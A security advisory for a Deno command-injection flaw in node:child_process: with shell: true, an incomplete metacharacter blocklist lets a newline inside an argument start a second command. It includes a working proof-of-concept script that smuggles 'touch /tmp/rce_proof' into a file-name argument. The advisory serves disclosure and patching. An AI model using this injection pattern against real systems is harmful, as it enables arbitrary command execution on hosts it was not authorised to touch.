JLSEC-2026-116 High 8.1

Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process

JLSEC Published
Modified
Severity
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Packages
Deno_jll < 2.6.10+0
Aliases / Upstream
EUVD-2026-7794 CVE-2026-27190 GHSA-hmh4-3xvx-q5hr

Summary

A command injection vulnerability exists in Deno's node:child_process implementation. When a child process is spawned with shell: true, the blocklist of shell metacharacters that is meant to neutralise arguments is incomplete: a newline embedded in an argument is not caught, so the shell treats the text after it as a second command.

Reproduction

import { spawnSync } from "node:child_process";
import * as fs from "node:fs";

// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}

// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');

// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;

// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
  shell: true,
  encoding: 'utf-8'
});

// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));

Run: deno run --allow-all poc.mjs

The file /tmp/rce_proof is created, confirming arbitrary command execution.

Mitigation

All users need to update to the patched version (Deno v2.6.8).

References